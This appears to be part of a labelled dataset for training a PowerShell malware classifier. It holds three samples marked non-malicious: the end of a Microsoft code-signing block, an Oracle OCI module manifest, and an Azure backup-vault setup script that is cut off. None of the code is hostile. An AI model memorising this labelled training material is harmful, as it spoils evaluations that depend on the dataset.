0W8Sb0vxi/vorcLHOL9i+t2D6yvvDzLlEefUCbQV/zGCBjXGlYJcUj6RAzXyeNAN # xSpKXAGd7Fh+ocGHPPphcD9LQTOJgG7Y7aYztHqBLJiQQ4eAgZNU4ac6+8LnEGAL # go1ydC5BJEuJQjYKbNTy959HrKSu7LO3Ws0w8jw6pYdC1IMpdTkk2puTgY2PDNzB # tLM4evG7FYer3WX+8t1UMYNTAgMBAAGjggFzMIIBbzAfBgNVHSUEGDAWBgorBgEE # AYI3TAgBBggrBgEFBQcDAzAdBgNVHQ4EFgQURxxxNPIEPGSO8kqz+bgCAQWGXsEw # RQYDVR0RBD4wPKQ6MDgxHjAcBgNVBAsTFU1pY3Jvc29mdCBDb3Jwb3JhdGlvbjEW # MBQGA1UEBRMNMjMwMDEyKzUwMTgyNjAfBgNVHSMEGDAWgBRIbmTlUAXTgqoXNzci # tW2oynUClTBUBgNVHR8ETTBLMEmgR6BFhkNodHRwOi8vd3d3Lm1pY3Jvc29mdC5j # b20vcGtpb3BzL2NybC9NaWNDb2RTaWdQQ0EyMDExXzIwMTEtMDctMDguY3JsMGEG # CCsGAQUFBwEBBFUwUzBRBggrBgEFBQcwAoZFaHR0cDovL3d3dy5taWNyb3NvZnQu # Y29tL3BraW9wcy9jZXJ0cy9NaWNDb2RTaWdQQ0EyMDExXzIwMTEtMDctMDguY3J0 # MAwGA1UdEwEB/wQCMAAwDQYJKoZIhvcNAQELBQADggIBAISxFt/zR2frTFPB45Yd # mhZpB2nNJoOoi+qlgcTlnO4QwlYN1w/vYwbDy/oFJolD5r6FMJd0RGcgEM8q9TgQ # 2OC7gQEmhweVJ7yuKJlQBH7P7Pg5RiqgV3cSonJ+OM4kFHbP3gPLiyzssSQdRuPY # 1mIWoGg9i7Y4ZC8ST7WhpSyc0pns2XsUe1XsIjaUcGu7zd7gg97eCUiLRdVklPmp # XobH9CEAWakRUGNICYN2AgjhRTC4j3KJfqMkU04R6Toyh4/Toswm1uoDcGr5laYn # TfcX3u5WnJqJLhuPe8Uj9kGAOcyo0O1mNwDa+LhFEzB6CB32+wfJMumfr6degvLT # e8x55urQLeTjimBQgS49BSUkhFN7ois3cZyNpnrMca5AZaC7pLI72vuqSsSlLalG # OcZmPHZGYJqZ0BacN274OZ80Q8B11iNokns9Od348bMb5Z4fihxaBWebl8kWEi2O # PvQImOAeq3nt7UWJBzJYLAGEpfasaA3ZQgIcEXdD+uwo6ymMzDY6UamFOfYqYWXk # ntxDGu7ngD2ugKUuccYKJJRiiz+LAUcj90BVcSHRLQop9N8zoALr/1sJuwPrVAtx # HNEgSW+AKBqIxYWM4Ev32l6agSUAezLMbq5f3d8x9qzT031jMDT+sUAoCw0M5wVt # CUQcqINPuYjbS1WgJyZIiEkBMIIHejCCBWKgAwIBAgIKYQ6Q0gAAAAAAAzANBgkq # hkiG9w0BAQsFADCBiDELMAkGA1UEBhMCVVMxEzARBgNVBAgTCldhc2hpbmd0b24x # EDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jvc29mdCBDb3Jwb3JhdGlv # bjEyMDAGA1UEAxMpTWljcm9zb2Z0IFJvb3QgQ2VydGlmaWNhdGUgQXV0aG9yaXR5 # IDIwMTEwHhcNMTEwNzA4MjA1OTA5WhcNMjYwNzA4MjEwOTA5WjB+MQswCQYDVQQG # EwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9uZDEeMBwG # A1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMSgwJgYDVQQDEx9NaWNyb3NvZnQg # Q29kZSBTaWduaW5nIFBDQSAyMDExMIICIjANBgkqhkiG9w0BAQEFAAOCAg8AMIIC # CgKCAgEAq/D6chAcLq3YbqqCEE00uvK2WCGfQhsqa+laUKq4BjgaBEm6f8MMHt03 # a8YS2AvwOMKZBrDIOdUBFDFC04kNeWSHfpRgJGyvnkmc6Whe0t+bU7IKLMOv2akr # rnoJr9eWWcpgGgXpZnboMlImEi/nqwhQz7NEt13YxC4Ddato88tt8zpcoRb0Rrrg # OGSsbmQ1eKagYw8t00CT+OPeBw3VXHmlSSnnDb6gE3e+lD3v++MrWhAfTVYoonpy # 4BI6t0le2O3tQ5GD2Xuye4Yb2T6xjF3oiU+EGvKhL1nkkDstrjNYxbc+/jLTswM9 # sbKvkjh+0p2ALPVOVpEhNSXDOW5kf1O6nA+tGSOEy/S6A4aN91/w0FK/jJSHvMAh # dCVfGCi2zCcoOCWYOUo2z3yxkq4cI6epZuxhH2rhKEmdX4jiJV3TIUs+UsS1Vz8k # A/DRelsv1SPjcF0PUUZ3s/gA4bysAoJf28AVs70b1FVL5zmhD+kjSbwYuER8ReTB # w3J64HLnJN+/RpnF78IcV9uDjexNSTCnq47f7Fufr/zdsGbiwZeBe+3W7UvnSSmn # Eyimp31ngOaKYnhfsi+E11ecXL93KCjx7W3DKI8sj0A3T8HhhUSJxAlMxdSlQy90 # lfdu+HggWCwTXWCVmj5PM4TasIgX3p5O9JawvEagbJjS4NaIjAsCAwEAAaOCAe0w # ggHpMBAGCSsGAQQBgjcVAQQDAgEAMB0GA1UdDgQWBBRIbmTlUAXTgqoXNzcitW2o # ynUClTAZBgkrBgEEAYI3FAIEDB4KAFMAdQBiAEMAQTALBgNVHQ8EBAMCAYYwDwYD # VR0TAQH/BAUwAwEB/zAfBgNVHSMEGDAWgBRyLToCMZBDuRQFTuHqp8cx0SOJNDBa # BgNVHR8EUzBRME+gTaBLhklodHRwOi8vY3JsLm1pY3Jvc29mdC5jb20vcGtpL2Ny # bC9wcm9kdWN0cy9NaWNSb29DZXJBdXQyMDExXzIwMTFfMDNfMjIuY3JsMF4GCCsG # AQUFBwEBBFIwUDBOBggrBgEFBQcwAoZCaHR0cDovL3d3dy5taWNyb3NvZnQuY29t # L3BraS9jZXJ0cy9NaWNSb29DZXJBdXQyMDExXzIwMTFfMDNfMjIuY3J0MIGfBgNV # HSAEgZcwgZQwgZEGCSsGAQQBgjcuAzCBgzA/BggrBgEFBQcCARYzaHR0cDovL3d3 # dy5taWNyb3NvZnQuY29tL3BraW9wcy9kb2NzL3ByaW1hcnljcHMuaHRtMEAGCCsG # AQUFBwICMDQeMiAdAEwAZQBnAGEAbABfAHAAbwBsAGkAYwB5AF8AcwB0AGEAdABl # AG0AZQBuAHQALiAdMA0GCSqGSIb3DQEBCwUAA4ICAQBn8oalmOBUeRou09h0ZyKb # C5YR4WOSmUKWfdJ5DJDBZV8uLD74w3LRbYP+vj/oCso7v0epo/Np22O/IjWll11l # hJB9i0ZQVdgMknzSGksc8zxCi1LQsP1r4z4HLimb5j0bpdS1HXeUOeLpZMlEPXh6 # I/MTfaaQdION9MsmAkYqwooQu6SpBQyb7Wj6aC6VoCo/KmtYSWMfCWluWpiW5IP0 # wI/zRive/DvQvTXvbiWu5a8n7dDd8w6vmSiXmE0OPQvyCInWH8MyGOLwxS3OW560 # STkKxgrCxq2u5bLZ2xWIUUVYODJxJxp/sfQn+N4sOiBpmLJZiWhub6e3dMNABQam # ASooPoI/E01mC8CzTfXhj38cbxV9Rad25UAqZaPDXVJihsMdYzaXht/a8/jyFqGa # J+HNpZfQ7l1jQeNbB5yHPgZ3BtEGsXUfFL5hYbXw3MYbBL7fQccOKO7eZS/sl/ah # XJbYANahRr1Z85elCUtIEJmAH9AAKcWxm6U/RXceNcbSoqKfenoi+kiVH6v7RyOA # 9Z74v2u3S5fi63V4GuzqN5l5GEv/1rMjaHXmr/r8i+sLgOppO6/8MO0ETI7f33Vt # Y5E90Z1WTk+/gFcioXgRMiF670EKsT/7qMykXcGhiJtXcVZOSEXAQsmbdlsKgEhr # /Xmfwb1tbWrJUnMTDXpQzTGCGgowghoGAgEBMIGVMH4xCzAJBgNVBAYTAlVTMRMw # EQYDVQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVN # aWNyb3NvZnQgQ29ycG9yYXRpb24xKDAmBgNVBAMTH01pY3Jvc29mdCBDb2RlIFNp # Z25pbmcgUENBIDIwMTECEzMAAAOvMEAOTKNNBUEAAAAAA68wDQYJYIZIAWUDBAIB # BQCgga4wGQYJKoZIhvcNAQkDMQwGCisGAQQBgjcCAQQwHAYKKwYBBAGCNwIBCzEO # MAwGCisGAQQBgjcCARUwLwYJKoZIhvcNAQkEMSIEIF7C2JVpL7xHyuuWiAxHJtTo # /869QWLZWkNoEhcH+VWFMEIGCisGAQQBgjcCAQwxNDAyoBSAEgBNAGkAYwByAG8A # cwBvAGYAdKEagBhodHRwOi8vd3d3Lm1pY3Jvc29mdC5jb20wDQYJKoZIhvcNAQEB # BQAEggEAfWFpq7bhwhLHlrwggzA+fc32M8Bb1oyPNSFtJvcXLXZhLQgSzJaC2e4l # ViaZsK5jcHJWqJr9iAqbou43UULQgsHwUqqOr4YG7f5uVbs2F/bExtfAzqnphpbB # j1ohU0dR9UfP5meh8rjB+yCDj4v72+dItm54EQhEmqhBVKMl0cP4sTm6DmQEytcV # Y0nu5hhDNkMTtWW5Yhs0zBTrMNCnBNFH9Gt47gbBzO4lTa/gMJSJIFKOTDnERo+m # Cbdh3gULyxBN6xe5/PMhb/E7WIgVpc4cEPOkmvTokQbPTSQRL8V7QpZh8rNxQHbd # ndz7FXTML9LgQyhdjX+IkoMuYJQ5AKGCF5QwgheQBgorBgEEAYI3AwMBMYIXgDCC # F3wGCSqGSIb3DQEHAqCCF20wghdpAgEDMQ8wDQYJYIZIAWUDBAIBBQAwggFSBgsq # hkiG9w0BCRABBKCCAUEEggE9MIIBOQIBAQYKKwYBBAGEWQoDATAxMA0GCWCGSAFl # AwQCAQUABCBk/ubIRKqaAqYX0jkwwHO+8IxES8zlbGkKT6UH7vg/LgIGZkYSR+pt # GBMyMDI0MDYxMzAxMTQ1Ny43ODVaMASAAgH0oIHRpIHOMIHLMQswCQYDVQQGEwJV # UzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9uZDEeMBwGA1UE # ChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMSUwIwYDVQQLExxNaWNyb3NvZnQgQW1l # cmljYSBPcGVyYXRpb25zMScwJQYDVQQLEx5uU2hpZWxkIFRTUyBFU046ODYwMy0w # NUUwLUQ5NDcxJTAjBgNVBAMTHE1pY3Jvc29mdCBUaW1lLVN0YW1wIFNlcnZpY2Wg # ghHqMIIHIDCCBQigAwIBAgITMwAAAfGzRfUn6MAW1gABAAAB8TANBgkqhkiG9w0B # AQsFADB8MQswCQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UE # BxMHUmVkbW9uZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMSYwJAYD # VQQDEx1NaWNyb3NvZnQgVGltZS1TdGFtcCBQQ0EgMjAxMDAeFw0yMzEyMDYxODQ1 # NTVaFw0yNTAzMDUxODQ1NTVaMIHLMQswCQYDVQQGEwJVUzETMBEGA1UECBMKV2Fz # aGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9uZDEeMBwGA1UEChMVTWljcm9zb2Z0IENv # cnBvcmF0aW9uMSUwIwYDVQQLExxNaWNyb3NvZnQgQW1lcmljYSBPcGVyYXRpb25z # MScwJQYDVQQLEx5uU2hpZWxkIFRTUyBFU046ODYwMy0wNUUwLUQ5NDcxJTAjBgNV # BAMTHE1pY3Jvc29mdCBUaW1lLVN0YW1wIFNlcnZpY2UwggIiMA0GCSqGSIb3DQEB # AQUAA4ICDwAwggIKAoICAQCxulCZttIf8X97rW9/J+Q4Vg9PiugB1ya1/DRxxLW2 # hwy4QgtU3j5fV75ZKa6XTTQhW5ClkGl6gp1nd5VBsx4Jb+oU4PsMA2foe8gP9bQN # PVxIHMJu6TYcrrn39Hddet2xkdqUhzzySXaPFqFMk2VifEfj+HR6JheNs2LLzm8F # DJm+pBddPDLag/R+APIWHyftq9itwM0WP5Z0dfQyI4WlVeUS+votsPbWm+RKsH4F # QNhzb0t/D4iutcfCK3/LK+xLmS6dmAh7AMKuEUl8i2kdWBDRcc+JWa21SCefx5SP # hJEFgYhdGPAop3G1l8T33cqrbLtcFJqww4TQiYiCkdysCcnIF0ZqSNAHcfI9SAv3 # gfkyxqQNJJ3sTsg5GPRF95mqgbfQbkFnU17iYbRIPJqwgSLhyB833ZDgmzxbKmJm # dDabbzS0yGhngHa6+gwVaOUqcHf9w6kwxMo+OqG3QZIcwd5wHECs5rAJZ6PIyFM7 # Ad2hRUFHRTi353I7V4xEgYGuZb6qFx6Pf44i7AjXbptUolDcVzYEdgLQSWiuFajS # 6Xg3k7Cy8TiM5HPUK9LZInloTxuULSxJmJ7nTjUjOj5xwRmC7x2S/mxql8nvHSCN # 1OED2/wECOot6MEe9bL3nzoKwO8TNlEStq5scd25GA0gMQO+qNXV/xTDOBTJ8zBc # GQIDAQABo4IBSTCCAUUwHQYDVR0OBBYEFLy2xe59sCE0SjycqE5Erb4YrS1gMB8G # A1UdIwQYMBaAFJ+nFV0AXmJdg/Tl0mWnG1M1GelyMF8GA1UdHwRYMFYwVKBSoFCG # Tmh0dHA6Ly93d3cubWljcm9zb2Z0LmNvbS9wa2lvcHMvY3JsL01pY3Jvc29mdCUy # MFRpbWUtU3RhbXAlMjBQQ0ElMjAyMDEwKDEpLmNybDBsBggrBgEFBQcBAQRgMF4w # XAYIKwYBBQUHMAKGUGh0dHA6Ly93d3cubWljcm9zb2Z0LmNvbS9wa2lvcHMvY2Vy # dHMvTWljcm9zb2Z0JTIwVGltZS1TdGFtcCUyMFBDQSUyMDIwMTAoMSkuY3J0MAwG # A1UdEwEB/wQCMAAwFgYDVR0lAQH/BAwwCgYIKwYBBQUHAwgwDgYDVR0PAQH/BAQD # AgeAMA0GCSqGSIb3DQEBCwUAA4ICAQDhSEjSBFSCbJyl3U/QmFMW2eLPBknnlsfI # D/7gTMvANEnhq08I9HHbbqiwqDEHSvARvKtL7j0znICYBbMrVSmvgDxU8jAGqMyi # LoM80788So3+T6IZV//UZRJqBl4oM3bCIQgFGo0VTeQ6RzYL+t1zCUXmmpPmM4xc # ScVFATXj5Tx7By4ShWUC7Vhm7picDiU5igGjuivRhxPvbpflbh/bsiE5tx5cuOJE # JSG+uWcqByR7TC4cGvuavHSjk1iRXT/QjaOEeJoOnfesbOdvJrJdbm+leYLRI67N # 3cd8B/suU21tRdgwOnTk2hOuZKs/kLwaX6NsAbUy9pKsDmTyoWnGmyTWBPiTb2rp # 5ogo8Y8hMU1YQs7rHR5hqilEq88jF+9H8Kccb/1ismJTGnBnRMv68Ud2l5LFhOZ4 # nRtl4lHri+N1L8EBg7aE8EvPe8Ca9gz8sh2F4COTYd1PHce1ugLvvWW1+aOSpd8N # nwEid4zgD79ZQxisJqyO4lMWMzAgEeFhUm40FshtzXudAsX5LoCil4rLbHfwYtGO # pw9DVX3jXAV90tG9iRbcqjtt3vhW9T+L3fAZlMeraWfh7eUmPltMU8lEQOMelo/1 # ehkIGO7YZOHxUqeKpmF9QaW8LXTT090AHZ4k6g+tdpZFfCMotyG+E4XqN6ZWtKEB # QiE3xL27BDCCB3EwggVZoAMCAQICEzMAAAAVxedrngKbSZkAAAAAABUwDQYJKoZI # hvcNAQELBQAwgYgxCzAJBgNVBAYTAlVTMRMwEQYDVQQIEwpXYXNoaW5ndG9uMRAw # DgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVNaWNyb3NvZnQgQ29ycG9yYXRpb24x # MjAwBgNVBAMTKU1pY3Jvc29mdCBSb290IENlcnRpZmljYXRlIEF1dGhvcml0eSAy # MDEwMB4XDTIxMDkzMDE4MjIyNVoXDTMwMDkzMDE4MzIyNVowfDELMAkGA1UEBhMC # VVMxEzARBgNVBAgTCldhc2hpbmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNV # BAoTFU1pY3Jvc29mdCBDb3Jwb3JhdGlvbjEmMCQGA1UEAxMdTWljcm9zb2Z0IFRp # bWUtU3RhbXAgUENBIDIwMTAwggIiMA0GCSqGSIb3DQEBAQUAA4ICDwAwggIKAoIC # AQDk4aZM57RyIQt5osvXJHm9DtWC0/3unAcH0qlsTnXIyjVX9gF/bErg4r25Phdg # M/9cT8dm95VTcVrifkpa/rg2Z4VGIwy1jRPPdzLAEBjoYH1qUoNEt6aORmsHFPPF # dvWGUNzBRMhxXFExN6AKOG6N7dcP2CZTfDlhAnrEqv1yaa8dq6z2Nr41JmTamDu6 # GnszrYBbfowQHJ1S/rboYiXcag/PXfT+jlPP1uyFVk3v3byNpOORj7I5LFGc6XBp # Dco2LXCOMcg1KL3jtIckw+DJj361VI/c+gVVmG1oO5pGve2krnopN6zL64NF50Zu # yjLVwIYwXE8s4mKyzbnijYjklqwBSru+cakXW2dg3viSkR4dPf0gz3N9QZpGdc3E # XzTdEonW/aUgfX782Z5F37ZyL9t9X4C626p+Nuw2TPYrbqgSUei/BQOj0XOmTTd0 # lBw0gg/wEPK3Rxjtp+iZfD9M269ewvPV2HM9Q07BMzlMjgK8QmguEOqEUUbi0b1q # GFphAXPKZ6Je1yh2AuIzGHLXpyDwwvoSCtdjbwzJNmSLW6CmgyFdXzB0kZSU2LlQ # +QuJYfM2BjUYhEfb3BvR/bLUHMVr9lxSUV0S2yW6r1AFemzFER1y7435UsSFF5PA # PBXbGjfHCBUYP3irRbb1Hode2o+eFnJpxq57t7c+auIurQIDAQABo4IB3TCCAdkw # EgYJKwYBBAGCNxUBBAUCAwEAATAjBgkrBgEEAYI3FQIEFgQUKqdS/mTEmr6CkTxG # NSnPEP8vBO4wHQYDVR0OBBYEFJ+nFV0AXmJdg/Tl0mWnG1M1GelyMFwGA1UdIARV # MFMwUQYMKwYBBAGCN0yDfQEBMEEwPwYIKwYBBQUHAgEWM2h0dHA6Ly93d3cubWlj # cm9zb2Z0LmNvbS9wa2lvcHMvRG9jcy9SZXBvc2l0b3J5Lmh0bTATBgNVHSUEDDAK # BggrBgEFBQcDCDAZBgkrBgEEAYI3FAIEDB4KAFMAdQBiAEMAQTALBgNVHQ8EBAMC # AYYwDwYDVR0TAQH/BAUwAwEB/zAfBgNVHSMEGDAWgBTV9lbLj+iiXGJo0T2UkFvX # zpoYxDBWBgNVHR8ETzBNMEugSaBHhkVodHRwOi8vY3JsLm1pY3Jvc29mdC5jb20v # cGtpL2NybC9wcm9kdWN0cy9NaWNSb29DZXJBdXRfMjAxMC0wNi0yMy5jcmwwWgYI # KwYBBQUHAQEETjBMMEoGCCsGAQUFBzAChj5odHRwOi8vd3d3Lm1pY3Jvc29mdC5j # b20vcGtpL2NlcnRzL01pY1Jvb0NlckF1dF8yMDEwLTA2LTIzLmNydDANBgkqhkiG # 9w0BAQsFAAOCAgEAnVV9/Cqt4SwfZwExJFvhnnJL/Klv6lwUtj5OR2R4sQaTlz0x # M7U518JxNj/aZGx80HU5bbsPMeTCj/ts0aGUGCLu6WZnOlNN3Zi6th542DYunKmC # VgADsAW+iehp4LoJ7nvfam++Kctu2D9IdQHZGN5tggz1bSNU5HhTdSRXud2f8449 # xvNo32X2pFaq95W2KFUn0CS9QKC/GbYSEhFdPSfgQJY4rPf5KYnDvBewVIVCs/wM # nosZiefwC2qBwoEZQhlSdYo2wh3DYXMuLGt7bj8sCXgU6ZGyqVvfSaN0DLzskYDS # PeZKPmY7T7uG+jIa2Zb0j/aRAfbOxnT99kxybxCrdTDFNLB62FD+CljdQDzHVG2d # Y3RILLFORy3BFARxv2T5JL5zbcqOCb2zAVdJVGTZc9d/HltEAY5aGZFrDZ+kKNxn # GSgkujhLmm77IVRrakURR6nxt67I6IleT53S0Ex2tVdUCbFpAUR+fKFhbHP+Crvs # QWY9af3LwUFJfn6Tvsv4O+S3Fb+0zj6lMVGEvL8CwYKiexcdFYmNcP7ntdAoGokL # jzbaukz5m/8K6TT4JDVnK+ANuOaMmdbhIurwJ0I9JZTmdHRbatGePu1+oDEzfbzL # 6Xu/OHBE0ZDxyKs6ijoIYn/ZcGNTTY3ugm2lBRDBcQZqELQdVTNYs6FwZvKhggNN # MIICNQIBATCB+aGB0aSBzjCByzELMAkGA1UEBhMCVVMxEzARBgNVBAgTCldhc2hp # bmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jvc29mdCBDb3Jw # b3JhdGlvbjElMCMGA1UECxMcTWljcm9zb2Z0IEFtZXJpY2EgT3BlcmF0aW9uczEn # MCUGA1UECxMeblNoaWVsZCBUU1MgRVNOOjg2MDMtMDVFMC1EOTQ3MSUwIwYDVQQD # ExxNaWNyb3NvZnQgVGltZS1TdGFtcCBTZXJ2aWNloiMKAQEwBwYFKw4DAhoDFQD7 # n7Bk4gsM2tbU/i+M3BtRnLj096CBgzCBgKR+MHwxCzAJBgNVBAYTAlVTMRMwEQYD # VQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVNaWNy # b3NvZnQgQ29ycG9yYXRpb24xJjAkBgNVBAMTHU1pY3Jvc29mdCBUaW1lLVN0YW1w # IFBDQSAyMDEwMA0GCSqGSIb3DQEBCwUAAgUA6hQnQjAiGA8yMDI0MDYxMjEzNTUx # NFoYDzIwMjQwNjEzMTM1NTE0WjB0MDoGCisGAQQBhFkKBAExLDAqMAoCBQDqFCdC # AgEAMAcCAQACAgzBMAcCAQACAhLIMAoCBQDqFXjCAgEAMDYGCisGAQQBhFkKBAIx # KDAmMAwGCisGAQQBhFkKAwKgCjAIAgEAAgMHoSChCjAIAgEAAgMBhqAwDQYJKoZI # hvcNAQELBQADggEBABEUsXwTzWLKrIFEGFil+a16Dcx/YVDkZt3NVa+qI8oKfR1H # yxIqEzSo09YKJ5TZPpxfMWtptd7aKoFLhfF9ciql0MZ24aYMK7xCB8om5N8+vTqv # KdS0wEFXWfzbwnTCroMn2zl4C8uiQnWOL3thnwZIFlwu6BWd7kiN38MjvAZKxdSE # TwSQ6s/GIL6MygETpMobICcuIZdEWi/bF66kds7a6x89gJYxN2hYU804/ugXgNrr # UcvlvT+54azkUZlNioI/LNNu9sbH/JDFZKLDbW33SeRkcD7s2B6VNA1W5vLMWnba # l2uD+fx+1NT5QuC0SfMTqbMd/DvplbAKR/K+JuAxggQNMIIECQIBATCBkzB8MQsw # CQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9u # ZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMSYwJAYDVQQDEx1NaWNy # b3NvZnQgVGltZS1TdGFtcCBQQ0EgMjAxMAITMwAAAfGzRfUn6MAW1gABAAAB8TAN # BglghkgBZQMEAgEFAKCCAUowGgYJKoZIhvcNAQkDMQ0GCyqGSIb3DQEJEAEEMC8G # CSqGSIb3DQEJBDEiBCAruzY1sUA74ZsqX1IN8OHiYRfwna8CQiBeJ+9BaWSpTzCB # +gYLKoZIhvcNAQkQAi8xgeowgecwgeQwgb0EINV3/T5hS7ijwao466RosB7wwEib # t0a1P5EqIwEj9hF4MIGYMIGApH4wfDELMAkGA1UEBhMCVVMxEzARBgNVBAgTCldh # c2hpbmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jvc29mdCBD # b3Jwb3JhdGlvbjEmMCQGA1UEAxMdTWljcm9zb2Z0IFRpbWUtU3RhbXAgUENBIDIw # MTACEzMAAAHxs0X1J+jAFtYAAQAAAfEwIgQgQdQxzrw1JZ/jFeRei5ywaMgWhn+I # e8cj7H/1NlVkem4wDQYJKoZIhvcNAQELBQAEggIAYOCUwj3w+1usjXDKPslEewYb # GYEqktG//FDW/oJjb1QquO93Ix99mV21d4OTpFV8NjYZ1gFHwfDt1hCm44grhrrv # NSNbrQNV18ayM4aSqghNQEDot7hOspOvVrYKQ9HdzcdHysBRNfMB33OuK93y11A4 # 1lAk5hBa+pWnmtRaPK8TedAgNxTDRnx9hHo6xXX2z7wVItY93CqXlIlZgnNwt6Vm # aYYV77rsIe+Hk1mV00UnxH5/ajKB2jc0tunJDugrKHNXDOiwr6HsNv+F6Fy5VnUj # 7K8irp4O4VG9XAhddWf0iZl0Zx27sSQayAUsfblGijLfs2+J1OAv3I5LOmVpJAfN # m8MPMV5GVOzRcY70MBLqMlemp93UU1DXz+vPaINBzxiqcAQjx5OJeNvEAxPhE/2N # PI3Q0RXTdbjJECZ2raUEwlRUVD0AgjXj3SUhLlU/r6uFq0UuGdrlywUH0oqqeAGJ # zhMnvUdIRycox7uEWVUP4RC9/N72aPdZl3hgM8deWbtPmg60mx2aRIT3ViJ3E4YZ # EDSp3AycUDctJt6rAy0i+Wyfq2JUc6buE1AP+cn0j3QppWnDS/1KxnMT7meLvMV0 # 0gEi0o1Hj79XHMlrom3Zwap8Ng+aEJu6lCE9d7w2X1TLeWK+jZUPFDGgv9XwN9jc # Lq80q+jgByMOBWRjCx4= # SIG # End signature block
combined_dataset/train/non-malicious/sample_59_46.ps1
sample_59_46.ps1
# # Module manifest for module 'OCI.PSModules.Sch' # # Generated by: Oracle Cloud Infrastructure # # @{ # Script module or binary module file associated with this manifest. RootModule = 'assemblies/OCI.PSModules.Sch.dll' # Version number of this module. ModuleVersion = '86.2.0' # Supported PSEditions CompatiblePSEditions = 'Core' # ID used to uniquely identify this module GUID = '0e74736a-d7dc-4743-afef-d79b95248dee' # Author of this module Author = 'Oracle Cloud Infrastructure' # Company or vendor of this module CompanyName = 'Oracle Corporation' # Copyright statement for this module Copyright = '(c) Oracle Cloud Infrastructure. All rights reserved.' # Description of the functionality provided by this module Description = 'This modules provides Cmdlets for OCI Sch Service' # Minimum version of the PowerShell engine required by this module PowerShellVersion = '6.0' # Name of the PowerShell host required by this module # PowerShellHostName = '' # Minimum version of the PowerShell host required by this module # PowerShellHostVersion = '' # Minimum version of Microsoft .NET Framework required by this module. This prerequisite is valid for the PowerShell Desktop edition only. # DotNetFrameworkVersion = '' # Minimum version of the common language runtime (CLR) required by this module. This prerequisite is valid for the PowerShell Desktop edition only. # ClrVersion = '' # Processor architecture (None, X86, Amd64) required by this module # ProcessorArchitecture = '' # Modules that must be imported into the global environment prior to importing this module RequiredModules = @(@{ModuleName = 'OCI.PSModules.Common'; GUID = 'b3061a0d-375b-4099-ae76-f92fb3cdcdae'; RequiredVersion = '86.2.0'; }) # Assemblies that must be loaded prior to importing this module RequiredAssemblies = 'assemblies/OCI.DotNetSDK.Sch.dll' # Script files (.ps1) that are run in the caller's environment prior to importing this module. # ScriptsToProcess = @() # Type files (.ps1xml) to be loaded when importing this module # TypesToProcess = @() # Format files (.ps1xml) to be loaded when importing this module # FormatsToProcess = @() # Modules to import as nested modules of the module specified in RootModule/ModuleToProcess # NestedModules = @() # Functions to export from this module, for best performance, do not use wildcards and do not delete the entry, use an empty array if there are no functions to export. FunctionsToExport = '*' # Cmdlets to export from this module, for best performance, do not use wildcards and do not delete the entry, use an empty array if there are no cmdlets to export. CmdletsToExport = 'Enable-OCISchServiceConnector', 'Get-OCISchConnectorPlugin', 'Get-OCISchConnectorPluginsList', 'Get-OCISchServiceConnector', 'Get-OCISchServiceConnectorsList', 'Get-OCISchWorkRequest', 'Get-OCISchWorkRequestErrorsList', 'Get-OCISchWorkRequestLogsList', 'Get-OCISchWorkRequestsList', 'Invoke-OCISchDeactivateServiceConnector', 'Move-OCISchServiceConnectorCompartment', 'New-OCISchServiceConnector', 'Remove-OCISchServiceConnector', 'Update-OCISchServiceConnector' # Variables to export from this module VariablesToExport = '*' # Aliases to export from this module, for best performance, do not use wildcards and do not delete the entry, use an empty array if there are no aliases to export. AliasesToExport = '*' # DSC resources to export from this module # DscResourcesToExport = @() # List of all modules packaged with this module # ModuleList = @() # List of all files packaged with this module # FileList = @() # Private data to pass to the module specified in RootModule/ModuleToProcess. This may also contain a PSData hashtable with additional module metadata used by PowerShell. PrivateData = @{ PSData = @{ # Tags applied to this module. These help with module discovery in online galleries. Tags = 'PSEdition_Core','Windows','Linux','macOS','Oracle','OCI','Cloud','OracleCloudInfrastructure','Sch' # A URL to the license for this module. LicenseUri = 'https://github.com/oracle/oci-powershell-modules/blob/master/LICENSE.txt' # A URL to the main website for this project. ProjectUri = 'https://github.com/oracle/oci-powershell-modules/' # A URL to an icon representing this module. IconUri = 'https://github.com/oracle/oci-powershell-modules/blob/master/icon.png' # ReleaseNotes of this module ReleaseNotes = 'https://github.com/oracle/oci-powershell-modules/blob/master/CHANGELOG.md' # Prerelease string of this module # Prerelease = '' # Flag to indicate whether the module requires explicit user acceptance for install/update/save # RequireLicenseAcceptance = $false # External dependent modules of this module # ExternalModuleDependencies = @() } # End of PSData hashtable } # End of PrivateData hashtable # HelpInfo URI of this module # HelpInfoURI = '' # Default prefix for commands exported from this module. Override the default prefix using Import-Module -Prefix. # DefaultCommandPrefix = '' }
combined_dataset/train/non-malicious/856.ps1
856.ps1
$rsVaultName = "myRsVault" $rgName = "myResourceGroup" $location = "East US" Register-AzResourceProvider -ProviderNamespace "Microsoft.RecoveryServices" New-AzResourceGroup -Location $location -Name $rgName New-AzRecoveryServicesVault ` -Name $rsVaultName ` -ResourceGroupName $rgName ` -Location $location $vault1 = Get-AzRecoveryServicesVault -Name $rsVaultName Set-AzRecoveryServicesProperties ` -Vault $vault1 ` -BackupStorageRedundancy GeoRedundant Get-AzRecoveryServicesVault -Name $rsVaultName | Set-AzRecoveryServicesVaultContext $schPol = Get-AzRecoveryServicesSchedulePolicyObject -WorkloadType "AzureVM" $retPol = Get-AzRecoveryServicesRetentionPolicyObject -WorkloadType "AzureVM" New-AzRecoveryServicesProtectionPolicy ` -Name "NewPolicy" ` -WorkloadType "AzureVM" ` 